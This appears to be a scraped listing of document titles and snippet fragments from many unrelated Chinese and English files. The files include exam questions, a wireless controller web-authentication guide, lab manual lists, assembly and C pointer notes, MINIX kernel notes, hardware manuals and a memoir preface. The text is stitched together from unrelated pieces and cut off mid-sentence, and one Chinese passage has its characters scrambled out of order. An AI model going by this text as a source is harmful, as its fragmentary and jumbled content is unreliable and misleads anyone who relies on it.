1. 請 問 誰 提 出 積 體 電 路 (IC) 上 可 容 納 的 電 晶 體 數 目, 約 每 隔 24 個 月 (1975 年 更 改 為 18 個 月 ) 便 會 增 加 一 倍, 效 能 也 將 提 升 一 倍, 也 揭 示 了 資 訊 科 技 進 步 的 速 度? (A) 英 特 爾 (Intel) 公 司 創 始 人 戈 登. 摩 爾 (Gordon Moore) (B) 微 軟 (Microsoft)
ext-web-auth-wlc.pdf
使 用 无 线 局 域 网 控 制 器 的 外 部 Web 身 份 验 证 配 置 示 例 目 录 简 介 先 决 条 件 要 求 使 用 的 组 件 规 则 背 景 信 息 外 部 Web 身 份 验 证 过 程 网 络 设 置 配 置 为 来 宾 用 户 创 建 动 态 接 口 创 建 预 先 身 份 验 证 ACL 在 WLC 上 为 来 宾 用 户 创 建 本 地 数 据 库 配 置 外 部
典型自编教材
河 南 科 技 大 学 计 算 机 实 验 教 学 中 心 1. 计 算 机 文 化 基 础 实 验 指 导 书 2. 数 据 结 构 实 验 指 导 书 3. 操 作 系 统 实 验 指 导 书 4. 面 向 对 象 程 序 设 计 实 验 指 导 书 5. 数 据 库 原 理 实 验 指 导 书 6. 编 译 原 理 实 验 指 导 书 7. JAVA 程 序 设 计 实 验 指 导 书 8.
Microsoft Word - 2CA13內文.doc
006 公 民 - 歷 屆 試 題 全 解 答 案 是 完 全 正 確 的? : 能 源 使 用 愈 多, 除 了 帶 來 經 濟 成 長 外, 相 對 的, 也 會 帶 來 負 面 的 環 保 問 題 我 們 在 發 展 經 濟 的 過 程 中, 若 不 能 兼 顧 環 境 資 源 的 保 育, 將 賠 上 後 代 子 孫 的 生 存 環 境, 這 是 下 列 那 一 種 理 念? 比 較 利 益
,768 32,767 32K JMP Jnnn (386+) LOOP CALL [Label:] JMP short/near/far address L10: jmp jmp L20: L10 L20
(Jump) (Loop) (Conditional jump) CMP CALL AND SAR/SHR TEST JMP NOT SAL/SHL Jnnn* OR RCR/ROR LOOP XOR RCL/ROL RETn * nnn, JNE JL -128 127-32,768 32,767 32K JMP Jnnn (386+) LOOP CALL [Label:] JMP short/near/far
<4D6963726F736F667420576F7264202D20BBFAB5E7BFD8D6C6B9A4B3CCD7A8D2B5BFCEB3CCC9E8BCC6D6B8B5BCB4F3B8D92E646F63>
机 电 控 制 工 程 专 业 课 程 设 计 指 导 大 纲 ( 二 级 项 目 ) 负 责 人 : 姜 万 录 孔 祥 东 张 齐 生 吴 晓 明 开 课 学 期 : 第 七 学 期 课 程 类 别 : 实 践 性 教 学 环 节 课 程 名 称 : 液 压 传 动 系 统 气 压 传 动 及 控 制 电 液 伺 服 与 比 例 控 制 系 统 适 用 专 业 : 机 电 控 制 工 程 专 业
int *p int a 0x00C7 0x00C7 0x00C int I[2], *pi = &I[0]; pi++; char C[2], *pc = &C[0]; pc++; float F[2], *pf = &F[0]; pf++;
Memory & Pointer [email protected] 2.1 2.1.1 1 int *p int a 0x00C7 0x00C7 0x00C7 2.1.2 2 int I[2], *pi = &I[0]; pi++; char C[2], *pc = &C[0]; pc++; float F[2], *pf = &F[0]; pf++; 2.1.3 1. 2. 3. 3 int A,
Microsoft Word - 正文.doc
1 2 1 2 3 4 5 6 7 8 9 10 3 1 150 2 150 1 1 1.1 1.1.1 1.2 1.2.1 1.2.2 1.2.3 1.3 1.3.1 1.3.2 1.4 1.4.1 CPU 1.4.2 I/O 1.4.3 I/O 1.5 1.5.1 CISC RISC 1.5.2 1.5.3 1.6 1.6.1 1.6.2 N 1.6.3 2 2.1 2.1.1 2.1.2 2.1.3
哈尔滨应用职业技术学院2012年教育教学质量报告
哈 尔 滨 应 用 职 业 技 术 学 院 高 等 职 业 教 育 质 量 年 度 报 告 (2015) 哈 尔 滨 应 用 职 业 技 术 学 院 2015 年 1 月 目 录 一 学 院 简 介... 1 二 办 学 条 件... 1 1. 办 学 资 源... 1 2. 办 学 经 费... 2 3. 师 资 队 伍... 3 三 学 院 教 学... 3 1. 专 业 建 设... 3 2.
1.ai
HDMI camera ARTRAY CO,. LTD Introduction Thank you for purchasing the ARTCAM HDMI camera series. This manual shows the direction how to use the viewer software. Please refer other instructions or contact
Guide to Install SATA Hard Disks
SATA RAID 1. SATA. 2 1.1 SATA. 2 1.2 SATA 2 2. RAID (RAID 0 / RAID 1 / JBOD).. 4 2.1 RAID. 4 2.2 RAID 5 2.3 RAID 0 6 2.4 RAID 1.. 10 2.5 JBOD.. 16 3. Windows 2000 / Windows XP 20 1. SATA 1.1 SATA Serial
PTS7_Manual.PDF
User Manual Soliton Technologies CO., LTD www.soliton.com.tw - PCI V2.2. - PCI 32-bit / 33MHz * 2 - Zero Skew CLK Signal Generator. - (each Slot). -. - PCI. - Hot-Swap - DOS, Windows 98/2000/XP, Linux
------------------------------- 6 --------------------22 ------------------------------23 ---------------------------------- 24 1. ----------------------------------25 2. --------------------26 -------------------------------
<4D6963726F736F667420576F7264202D2031303030353235B77CC4B3ACF6BFFD2DB0D3B77EC2B2B3F8C2BEBAD82E646F63>
全 國 高 級 中 等 學 校 100 學 年 度 商 業 類 科 學 生 技 藝 競 賽 商 業 簡 報 職 種 競 賽 規 則 修 訂 會 議 紀 錄 壹 時 間 : 中 華 民 國 100 年 05 日 25 日 ( 星 期 三 ) 下 午 2 時 整 貳 地 點 : 豐 原 高 商 圖 書 館 一 樓 參 主 席 : 潘 教 授 偉 華 肆 出 席 單 位 及 人 員 :( 如 簽 到 表
06721 main() lock pick proc() restart() [2][4] MINIX minix2.0 GDT, IDT irq table[] CPU CPU CPU CPU (IDTR) idt[] CPU _hwint00:! Interrupt
MINIX ( 730000) ( 730000) MINIX MINIX2.0 MINIX : MINIX TP3 1 MINIX UNIX Tanenbaum UNIX MINIX LINUX MINIX MINIX MINIX1.0 UNIX V7 MINIX2.0[3] POSIX MINIX3 MINIX Gabriel A. Wainer 1994-1995 [5] 1998 I/O 2002
Microsoft Word - Sing Fu
作 者 自 序 開 始 營 商 辦 我 在 直 一 至 九 一 七 九 九 年 七 帶 年 了 在 太 身 太 體 檢 孩 查 子 舉 家 醫 從 生 上 告 海 知 遷 由 來 於 香 長 港 期 肝 為 了 生 我 活 的 植 肝 手 病 已 經 非 開 常 始 幸 壞 運 手 術 最 是 多 成 還 功 有 的 三 年 壽 那 命 種 一 九 九 八 年 去 了 美 國 做 了 肝 臟 移 在
JavaIO.PDF
O u t p u t S t ream j a v a. i o. O u t p u t S t r e a m w r i t e () f l u s h () c l o s e () public abstract void write(int b) throws IOException public void write(byte[] data) throws IOException
WebSphere Studio Application Developer IBM Portal Toolkit... 2/21 1. WebSphere Portal Portal WebSphere Application Server stopserver.bat -configfile..
WebSphere Studio Application Developer IBM Portal Toolkit... 1/21 WebSphere Studio Application Developer IBM Portal Toolkit Portlet Doug Phillips ([email protected]),, IBM Developer Technical Support Center
